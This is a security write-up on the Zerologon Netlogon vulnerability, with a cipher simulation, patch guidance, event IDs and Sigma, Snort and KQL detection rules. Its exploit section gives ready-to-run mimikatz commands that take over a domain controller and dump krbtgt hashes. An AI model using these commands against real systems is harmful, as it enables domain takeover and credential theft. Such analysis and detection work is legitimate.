CVE-2020-1472 aka Zerologon
TLDR
The Zerologon vulnerability allows an attacker with network access to a Windows Domain Controller to quickly and reliably take complete control of the Windows domain. The root cause is the Netlogon Remote Protocol's use of AES-CFB8 with an all-zero IV: an attacker who sends an all-zero client challenge and an all-zero client credential is accepted as the target machine account (including the DC's own) whenever the first keystream byte happens to be zero, which occurs on average once in 256 attempts, so the attack needs only seconds and no credentials. As such, it is a perfect vulnerability for any attacker and a nightmare for defenders. It was discovered by Tom Tervoort, a security researcher at Secura, and privately reported to Microsoft, which issued a patch for supported Windows versions as part of the August 2020 updates and assigned it CVE-2020-1472.
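The following is an added example, not code from the original post or from any of the PoCs linked below. It shows why the all-zero credential is accepted roughly once every 256 tries: in CFB8 mode the keystream for each byte is the first byte of the block cipher applied to a shift register that starts as the IV, so with a zero IV, zero plaintext and a zero first keystream byte the register never changes and every output byte is zero. To keep the example standard-library only, a SHA-256-based PRF stands in for the AES block function (an assumption, labelled in the code); the property being shown depends on the mode, not on the cipher, so it holds for AES exactly as it does here. Session keys are constructed from a counter so the run is deterministic.

```python
import hashlib

BLOCK_SIZE = 16  # AES has 16-byte blocks; the toy cipher below mimics that


def toy_block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for the AES block function.

    ASSUMPTION: a SHA-256-based pseudo-random function is used here only so the
    example runs without third-party crypto libraries. The CFB8 property
    demonstrated below depends on the mode, not on the block cipher, so the
    same reasoning applies to AES as used by Netlogon.
    """
    assert len(block) == BLOCK_SIZE
    return hashlib.sha256(key + block).digest()[:BLOCK_SIZE]


def cfb8_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB8 mode as used by Netlogon's ComputeNetlogonCredential.

    For every plaintext byte the block function is applied to a 16-byte shift
    register, the first output byte is XORed with the plaintext byte, and the
    resulting ciphertext byte is shifted into the register from the right.
    """
    register = bytearray(iv)
    ciphertext = bytearray()
    for p in plaintext:
        keystream_byte = toy_block_encrypt(key, bytes(register))[0]
        c = p ^ keystream_byte
        ciphertext.append(c)
        register = register[1:] + bytes([c])
    return bytes(ciphertext)


def zero_credential_accepted(session_key: bytes) -> bool:
    """True if an all-zero 8-byte client credential is valid under this session key.

    The DC computes ComputeNetlogonCredential(ClientChallenge) with IV = 0 and
    compares it with the ClientCredential the client sent. Zerologon sends
    ClientChallenge = 0 and ClientCredential = 0, so the check passes exactly
    when CFB8 of eight zero bytes under a zero IV yields eight zero bytes.
    """
    expected = cfb8_encrypt(session_key, bytes(BLOCK_SIZE), bytes(8))
    return expected == bytes(8)


def first_keystream_byte_is_zero(session_key: bytes) -> bool:
    """The single condition that makes the whole zero credential come out as zero:
    once the first ciphertext byte is 0 the shift register stays all-zero."""
    return toy_block_encrypt(session_key, bytes(BLOCK_SIZE))[0] == 0


def simulated_attack(max_attempts: int = 4096) -> int:
    """Simulate the attacker's loop: each authentication attempt gets a fresh
    session key (the DC picks a new server challenge every time), so each try
    independently succeeds with probability 1/256. Returns the attempt number
    that succeeded, or 0 if none did within max_attempts.

    CONSTRUCTED INPUT: session keys are derived from the attempt counter so the
    run is deterministic; a real DC derives them from the machine account
    password and both challenges.
    """
    for attempt in range(1, max_attempts + 1):
        session_key = hashlib.sha256(b"session-key-" + attempt.to_bytes(4, "big")).digest()
        if zero_credential_accepted(session_key):
            return attempt
    return 0


def success_rate(trials: int = 4096) -> float:
    """Fraction of simulated session keys for which the zero credential passes;
    expected to be close to 1/256."""
    hits = 0
    for n in range(trials):
        session_key = hashlib.sha256(b"rate-" + n.to_bytes(4, "big")).digest()
        hits += zero_credential_accepted(session_key)
    return hits / trials


if __name__ == "__main__":
    print("attempts needed:", simulated_attack())
    print("success rate per attempt: %.4f (1/256 = %.4f)" % (success_rate(), 1 / 256))
```

The patch Microsoft shipped rejects NetrServerAuthenticate calls whose client challenge starts with identical bytes, which is why the zero challenge stops working on a patched DC even before enforcement mode.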
Introduction
Netscylla has been busy investigating the exploit on different systems, testing the different proof-of-concept exploits. Real-world systems often behave differently from a lab, and unintended consequences can happen.
Exploit
Affected Systems
- Windows Server 2008 R2 64-bit
- Windows Server 2012
- Windows Server 2016
- Windows Server 2019
- Windows Server, versions 1903, 1909 and 2004
PoCs
- https://github.com/dirkjanm/CVE-2020-1472
- https://github.com/VoidSec/CVE-2020-1472
- https://github.com/gentilkiwi/mimikatz
Note: for the Python PoCs to work correctly, you will need a recent version of impacket (the PoCs depend on Netlogon structures that were only added to impacket in 2020, so an old distribution package will fail).
Using Mimikatz
Commands (listed here for copy and paste):
lsadump::zerologon /target:dc1.exploit.local /account:dc1$
lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt
Important:
- /target is the full FQDN of the target DC
- /account is the DC's computer account, i.e. the DC hostname followed by $
- /exploit sets the DC computer account password in Active Directory to an empty value but does not change the copy the DC keeps locally in its LSA secrets; the DC will start failing (replication, its own Kerberos tickets) until the original password is restored, which is why mimikatz prints "may be unstable" and why the dirkjanm repository ships a restorepassword.py. Only run this against a lab DC you can afford to break.
Example Usage:
C:\Users\user\Downloads\Win32>mimikatz.exe
.#####. mimikatz 2.2.0 (x86) #19041 Sep 18 2020 19:18:00
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # lsadump::zerologon /target:dc1.exploit.local /account:dc1$
Remote : dc1.exploit.local
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : dc1.exploit.local
Account: dc1$
Type : 6 (Server)
Mode : detect
Trying to 'authenticate'...
=========================================================================
NetrServerAuthenticate2: 0x00000000
* Authentication: OK -- vulnerable
mimikatz # lsadump::zerologon /target:dc1.exploit.local /account:dc1$ /exploit
Remote : dc1.exploit.local
ProtSeq : ncacn_ip_tcp
AuthnSvc : NONE
NULL Sess: no
Target : dc1.exploit.local
Account: dc1$
Type : 6 (Server)
Mode : exploit
Trying to 'authenticate'...
===========================================================================
NetrServerAuthenticate2: 0x00000000
NetrServerPasswordSet2 : 0x00000000
* Authentication: OK -- vulnerable
* Set password : OK -- may be unstable
mimikatz # lsadump::dcsync /dc:dc1.exploit.local /authuser:dc1$ /authdomain:exploit.local /authpassword:"" /domain:exploit.local /authntlm /user:krbtgt
[DC] 'exploit.local' will be the domain
[DC] 'dc1.exploit.local' will be the DC server
[DC] 'krbtgt' will be the user account
[AUTH] Username: dc1$
[AUTH] Domain : exploit.local
[AUTH] Password:
[AUTH] Explicit NTLM Mode
Object RDN : krbtgt
** SAM ACCOUNT **
SAM Username : krbtgt
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration :
Password last change : 22/09/2020 16:12:29
Object Security ID : S-1-5-21-1015760042-408406534-773346051-502
Object Relative ID : 502
Credentials:
Hash NTLM: 1b8cee51fd49e55e8c9c9004a4acc159
ntlm- 0: 75c424*****************58e088f92
lm - 0: 7c0800*****************df0fa84b0
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 0a17042d1d448f9266f9dafd4a7611cb
* Primary:Kerberos-Newer-Keys *
Default Salt : EXPLOIT.LOCALkrbtgt
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 810382037847ad39412f0aba970962ddfb796585330b97877a455c9582a05c68
aes128_hmac (4096) : b4c2cd6d8c005525316b006ca3c8cb51
des_cbc_md5 (4096) : 4f45195db5972f3b
* Primary:Kerberos *
Default Salt : EXPLOIT.LOCALkrbtgt
Credentials
des_cbc_md5 : 4f45195db5972f3b
* Packages *
NTLM-Strong-NTOWF
* Primary:WDigest *
01 1563c7e64e0815b57efcfcb5ae22dc90
02 3d61549adf12841ae05a09460b8edaed
03 fb64dbb289618735c2da07b6a1f702f4
04 1563c7e64e0815b57efcfcb5ae22dc90
05 3d61549adf12841ae05a09460b8edaed
06 1b6e21b21a8fd92ca8bf4d294bfc3f60
07 1563c7e64e0815b57efcfcb5ae22dc90
08 30a7542e7f5a3fa253623ca09c8fae36
09 30a7542e7f5a3fa253623ca09c8fae36
10 87e128fecc1e329456679440174cf983
11 212e2fabaedea53a6027d6a92c2c0d6e
12 30a7542e7f5a3fa253623ca09c8fae36
13 cfc27bc0430086e95ab3426e1d9e7dfd
14 212e2fabaedea53a6027d6a92c2c0d6e
15 5d0fd6579eb09201d85744a7142999d9
16 5d0fd6579eb09201d85744a7142999d9
17 597bdfe4008ee6d70351bd984e23f306
18 f517e48a822e71e63b17c44574fcde13
19 7379256ad109be5d3d8c42a6815730fd
20 6c8ecb285f193bcdf46022426ff5e6a2
21 6bb3bf4cd601b7c44cb36586c70bec82
22 6bb3bf4cd601b7c44cb36586c70bec82
23 4a5cc09043c5089904392f3240fe51a8
24 679dfdf11e1ec5b6a928a1acc30a49b4
25 679dfdf11e1ec5b6a928a1acc30a49b4
26 4517e188beee795177e2a2382b722cf6
27 f6c02a4415a0dad8ccc15f913c4dcf25
28 8b830ad87aab13f3c12a6d8f6eb2a6ae
29 b554dbcba6aebf1931c299a502f35cff
mimikatz #
Results from our testing
Setting up a fresh, fully patched 2016 Domain Controller, we were vulnerable, and you can see the mimikatz output above.
However, attacking a hardened DC, one where we use a custom authentication GINA from a 3rd party for MFA, and MFA is enforced for all DC user communication, the exploit failed. The error in our logs was 5805 - Error - the machine failed to authenticate.
We spent time trying to get to the bottom of the error, whether it was down to a specific hardening setting or to the 2FA authentication mechanism. In the end we concluded it was the 3rd-party 2FA software that affected the success of the exploit. Therefore, we conclude that it is always worth testing the legitimacy of an exploit on your own test domain, as real-life system improvements or changes can vastly change the outcome of a successful exploit.
Patches, Updates, am I vulnerable?
You may be patched and still be vulnerable. Microsoft released the fix for CVE-2020-1472 in the August 2020 updates, but if you read the advisory in full you will see that it is rolled out in two phases:
- Phase 1 (11 August 2020): the update fixes the cryptographic flaw on the DC and enforces secure RPC (signed and sealed Netlogon secure channels) for Windows machine accounts, trust accounts and all DCs, but still allows vulnerable Netlogon secure channel connections from non-Windows devices unless you set FullSecureChannelProtection to 1 under HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters. It also adds the new Event IDs 5827 to 5831 for logging and debugging, so you can find the non-compliant devices before Phase 2.
- Phase 2 (9 February 2021): enforcement mode becomes mandatory. All Netlogon connections must use secure RPC, the registry value can no longer turn enforcement off, and the only remaining exception is accounts explicitly listed in the "Domain controller: Allow vulnerable Netlogon secure channel connections" group policy.
You may also want to read https://support.microsoft.com/en-gb/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc
Useful Event IDs, old and new
- Event ID 4742; a computer account was changed. After a successful exploit the subject of this event is ANONYMOUS LOGON, because the password reset arrived over an unauthenticated Netlogon channel.
- Event ID 5805; a machine account failed to authenticate. Usually caused by multiple instances of the same computer name, by the computer name not yet having replicated to every domain controller, or (as in our testing) by the use of a custom GINA.
- Event ID 4624; a successful logon. During exploitation a 4624 for ANONYMOUS LOGON (logon type 3, from the attacker's IP) followed by a 4724 (an attempt was made to reset an account's password) against the DC's computer account is the signature of the password reset.
- Event ID 4662; an operation was performed on an object. A DCSync shows up as a 4662 on the domain naming context with the control access rights DS-Replication-Get-Changes (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2) and DS-Replication-Get-Changes-All (1131f6ad-9c07-11d1-f79f-00c04fc2dcd2); this requires Directory Service Access auditing to be enabled, and the exploit above makes the source of that request a DC's own computer account, which is itself unusual.
- Event IDs 5827 and 5828; a vulnerable Netlogon secure channel connection was denied (5827 for a machine account, 5828 for a trust account).
- Event ID 5829; a vulnerable Netlogon secure channel connection was allowed. Only logged during the initial deployment phase, before enforcement, and the list of devices that trigger it is your to-do list before February 2021.
- Event IDs 5830 and 5831; a vulnerable connection was allowed because the account is listed in the "Domain controller: Allow vulnerable Netlogon secure channel connections" group policy (5830 for a machine account, 5831 for a trust account).
- Sysmon Event ID 3; the network connection event logs TCP/UDP connections on the machine. When Zerologon is exploited, an incoming network connection from the attacking machine to the victim Domain Controller is recorded against the LSASS process.
Detection
SOC Prime Sigma rule:
title: Possible CVE-2020-1472 (zerologon)
description: CVE-2020-1472 (Netlogon Elevation of Privilege Vulnerability) may create thousands of NetrServerReqChallenge & NetrServerAuthenticate3 requests in a short amount of time.
author: SOC Prime Team
date: 2020/09/11
references:
    - https://github.com/SecuraBV/CVE-2020-1472
tags:
    - attack.lateral_movement
    - attack.T1210
logsource:
    product: zeek
    service: dce_rpc
detection:
    selection:
        endpoint: 'netlogon'
        operation: 'NetrServerReqChallenge'
    selection2:
        endpoint: 'netlogon'
        operation: 'NetrServerAuthenticate3'
    timeframe: 1m
    condition: selection or selection2 | count() by src_ip > 100
falsepositives:
    - 'unknown'
level: high
Snort rule
The rule as circulated had a placeholder where the DC addresses belong. Below it is written with a $DC_SERVERS variable that you must define in your Snort configuration as the list of DC IP addresses: a DCSync is a replication request sent to a DC, so the destination must be a DC and the source should exclude DCs (legitimate replication is DC to DC). The first content match is the DCE/RPC request header (ptype 0, first and last fragment flags, little-endian data representation) and the second, 14 bytes after it, is opnum 3, which on the drsuapi interface is DRSGetNCChanges, the call DCSync makes. The rule does not check which interface the presentation context was bound to, so opnum 3 on any other RPC interface over a dynamic port will also fire it.
alert tcp !$DC_SERVERS any -> $DC_SERVERS [49152:65535] (msg:"Possible DCSync Detected"; flow:to_server,established; flags:PA; content:"|00 03 10 00 00 00|"; depth:8; content:"|03 00|"; distance:14; classtype:attempted-admin; sid:20166316; rev:1;)
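To make the two content matches concrete, the following added example (not code from the original post or from the Snort project) builds minimal DCE/RPC request PDUs, emulates the rule's depth/distance semantics over them, and then applies the stricter check the rule cannot do because it keeps no per-connection state: opnum 3 on a context that was bound to the drsuapi interface UUID (e3514235-4b06-11d1-ab04-00c04fc2dcd2). The sample PDUs, the context-to-interface map and the SAMR UUID used for the contrast case are constructed for the example.

```python
import struct

DRSUAPI_IFACE = "e3514235-4b06-11d1-ab04-00c04fc2dcd2"  # MS-DRSR (drsuapi) interface UUID
SAMR_IFACE = "12345778-1234-abcd-ef00-0123456789ac"     # MS-SAMR, used only as a contrast case
OPNUM_DRSGETNCCHANGES = 3                                 # the call DCSync makes

# DCE/RPC connection-oriented request header (C706 / MS-RPCE), 24 bytes:
#   0 rpc_vers, 1 rpc_vers_minor, 2 ptype, 3 pfc_flags, 4-7 drep,
#   8-9 frag_length, 10-11 auth_length, 12-15 call_id,
#   16-19 alloc_hint, 20-21 p_cont_id, 22-23 opnum
REQUEST_HEADER = struct.Struct("<BBBBBBBBHHIIHH")


def build_request(opnum: int, stub: bytes, call_id: int = 1, context_id: int = 0) -> bytes:
    """Build a minimal little-endian DCE/RPC request PDU (CONSTRUCTED test data)."""
    header = REQUEST_HEADER.pack(
        5, 0,                                   # RPC version 5.0
        0,                                      # ptype 0 = request
        3,                                      # pfc_flags: PFC_FIRST_FRAG | PFC_LAST_FRAG
        0x10, 0, 0, 0,                          # drep: little-endian ints, ASCII, IEEE float
        REQUEST_HEADER.size + len(stub), 0,     # frag_length, auth_length
        call_id, len(stub),                     # call_id, alloc_hint
        context_id, opnum,
    )
    return header + stub


def snort_rule_matches(payload: bytes) -> bool:
    """Emulate the two content matches of the Snort rule above.

    content:"|00 03 10 00 00 00|"; depth:8  -> the 6 bytes must lie entirely within
        the first 8 bytes of the payload (ptype=0, flags=3, little-endian drep).
    content:"|03 00|"; distance:14          -> the search starts 14 bytes after the
        end of the previous match (offset 22, the opnum) and, because the rule has
        no 'within', continues to the end of the payload.
    """
    first = payload[:8].find(b"\x00\x03\x10\x00\x00\x00")
    if first < 0:
        return False
    end_of_first = first + 6
    return payload.find(b"\x03\x00", end_of_first + 14) >= 0


def parse_request(payload: bytes) -> dict:
    """Strict parse of the request header; raises ValueError if it is not a v5 request."""
    if len(payload) < REQUEST_HEADER.size:
        raise ValueError("short PDU")
    (vers, _vers_minor, ptype, flags, drep0, _, _, _,
     frag_len, _auth_len, call_id, _alloc_hint, ctx, opnum) = REQUEST_HEADER.unpack_from(payload)
    if vers != 5 or ptype != 0:
        raise ValueError("not a DCE/RPC v5 request")
    if drep0 & 0x10 == 0:
        raise ValueError("big-endian drep; opnum would need byte-swapping")
    return {"flags": flags, "frag_len": frag_len, "call_id": call_id,
            "context_id": ctx, "opnum": opnum}


def is_dcsync_request(payload: bytes, bound_interfaces: dict) -> bool:
    """Stricter check: the opnum must be exactly 3 AND the presentation context the
    request uses must have been bound to drsuapi.

    bound_interfaces maps context_id -> interface UUID as learned from the
    bind/bind_ack earlier on the same TCP connection. That is state the Snort
    rule does not keep, which is why it fires on opnum 3 of any interface.
    """
    try:
        req = parse_request(payload)
    except ValueError:
        return False
    return (req["opnum"] == OPNUM_DRSGETNCCHANGES
            and bound_interfaces.get(req["context_id"]) == DRSUAPI_IFACE)


# CONSTRUCTED sample PDUs and a constructed context map for one connection
CONTEXTS = {0: DRSUAPI_IFACE, 1: SAMR_IFACE}
DCSYNC = build_request(3, b"\x00" * 40, context_id=0)          # DRSGetNCChanges
SAMR_OPNUM3 = build_request(3, b"\x00" * 40, context_id=1)     # opnum 3 on another interface
OTHER = build_request(0, b"\x11\x22\x03\x00\x55", context_id=0)  # opnum 0, stub happens to contain 03 00

if __name__ == "__main__":
    for name, pdu in [("DCSync", DCSYNC), ("opnum 3 on SAMR", SAMR_OPNUM3), ("opnum 0", OTHER)]:
        print(f"{name:16} snort={snort_rule_matches(pdu)!s:5} strict={is_dcsync_request(pdu, CONTEXTS)}")
```

Running it shows the rule firing on all three PDUs while only the first is a DCSync; in production, pair the signature with the 4662 event on the DC or with a DCE/RPC-aware parser (Zeek's dce_rpc.log records the bound interface and operation name) to cut the noise.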
Azure Sentinel query (KQL; assumes Zeek dce_rpc logs are ingested into a Dce_Rpc table with a SourceIp column; the one-minute bin mirrors the Sigma rule's timeframe, without it the count runs over the whole query window and will fire on a busy, legitimate client):
Dce_Rpc
| where endpoint == "netlogon" and operation in ("NetrServerReqChallenge", "NetrServerAuthenticate3")
| summarize var = count() by SourceIp, bin(TimeGenerated, 1m)
| where var > 100
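Both the Sigma rule and the KQL above express the same logic, more than 100 Netlogon challenge/authenticate calls from one source within a minute. The following added example (not code from the original post, SOC Prime or Microsoft) runs that logic as a sliding window over Zeek dce_rpc.log records in JSON form so it can be tested offline. It goes slightly beyond the rule by also counting NetrServerAuthenticate2, because the mimikatz run shown earlier on this page uses that variant rather than NetrServerAuthenticate3. The log lines are constructed for the example; the field names are the ones Zeek emits.

```python
import json
from collections import defaultdict, deque

# Netlogon calls an exploitation loop drives. The Sigma rule matches
# NetrServerReqChallenge and NetrServerAuthenticate3; NetrServerAuthenticate2 is
# added because the mimikatz output on this page shows that variant.
NETLOGON_AUTH_OPS = {"NetrServerReqChallenge", "NetrServerAuthenticate2", "NetrServerAuthenticate3"}


def flag_sources(zeek_json_lines, threshold=100, window_seconds=60.0):
    """Sliding-window version of `count() by src_ip > 100` with timeframe 1m.

    Input: Zeek dce_rpc.log records in JSON format, one per line.
    Returns {source_ip: peak_count} for every source whose matching calls
    exceeded `threshold` within any `window_seconds`-long window.
    """
    events = []
    for line in zeek_json_lines:
        line = line.strip()
        if not line:
            continue
        rec = json.loads(line)
        if rec.get("endpoint") != "netlogon" or rec.get("operation") not in NETLOGON_AUTH_OPS:
            continue
        events.append((float(rec["ts"]), rec["id.orig_h"]))
    events.sort()  # Zeek writes in order, but merged exports may not be

    recent = defaultdict(deque)  # src_ip -> timestamps inside the current window
    peak = defaultdict(int)
    for ts, src in events:
        q = recent[src]
        q.append(ts)
        while ts - q[0] > window_seconds:  # q is never empty here
            q.popleft()
        peak[src] = max(peak[src], len(q))
    return {src: n for src, n in peak.items() if n > threshold}


def make_record(ts, src, dst, endpoint, operation):
    """One Zeek dce_rpc.log line in JSON form (CONSTRUCTED; field names as Zeek emits them)."""
    return json.dumps({
        "ts": ts, "uid": "CtPZjS20MLrsMUOJi2", "id.orig_h": src, "id.orig_p": 49210,
        "id.resp_h": dst, "id.resp_p": 49667, "rtt": 0.002,
        "endpoint": endpoint, "operation": operation,
    })


def sample_log():
    """CONSTRUCTED log: 150 exploitation rounds (ReqChallenge + Authenticate3) from
    10.0.0.50 within 15 seconds, one normal secure-channel setup from a workstation,
    and unrelated LSARPC traffic from the attacker that must not be counted."""
    dc = "10.0.0.10"
    base = 1600000000.0
    lines = []
    for i in range(150):
        lines.append(make_record(base + i * 0.1, "10.0.0.50", dc, "netlogon", "NetrServerReqChallenge"))
        lines.append(make_record(base + i * 0.1 + 0.03, "10.0.0.50", dc, "netlogon", "NetrServerAuthenticate3"))
    for op in ("NetrServerReqChallenge", "NetrServerAuthenticate3", "NetrLogonGetDomainInfo"):
        lines.append(make_record(base + 5.0, "10.0.0.7", dc, "netlogon", op))
    for i in range(120):
        lines.append(make_record(base + i * 0.05, "10.0.0.50", dc, "lsarpc", "LsarLookupNames"))
    return lines


if __name__ == "__main__":
    print(flag_sources(sample_log()))  # only the attacker, with its peak count
```

A real exploitation run averages about 256 rounds, so the threshold of 100 leaves headroom; what you tune in practice is the allow-list, since a DC that has lost its secure channel, or a monitoring box that polls many hosts, can also produce bursts of these calls.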